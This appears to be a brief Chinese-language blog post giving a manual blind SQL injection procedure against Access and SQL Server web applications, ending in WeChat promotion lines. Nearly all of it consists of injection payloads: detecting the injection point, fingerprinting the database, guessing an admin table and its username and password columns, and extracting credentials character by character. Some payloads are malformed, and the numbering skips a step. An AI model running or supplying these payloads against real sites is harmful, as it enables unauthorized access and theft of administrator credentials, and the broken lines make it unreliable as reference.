- A+
所属分类:sql注入
第一步:判断注入点,寻找注入点用‘引号报错 and1=1 正常 and 1=2 错误 说明存在sql注入
2.判断数据库类型:
and (select count(*) from sysobjects)>0 正常是sql server 数据库
and (select count(*) from msysobjects)>0 判断access 数据库 返回不够权限
3.猜表名
and exists (select * from admin)
4猜字段
and exists (select username from admin)
and exists (select password from admin)
5.字段长度 , len参数提取字段长度() 判断账号密码的长度
and (select top 1 len(username)from users)>0
and (select top 1 len(password) from admin)>0
猜用户名
第一位:
and (select top 1 asc(mid(username,1,1)) from admin)>100
第二位:
and(select top 1 asc(username,2,1)) from admin>100
7..猜密码
and (select top 1 asc(mid(password,1,1)) from admin)>100
工具验证:
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫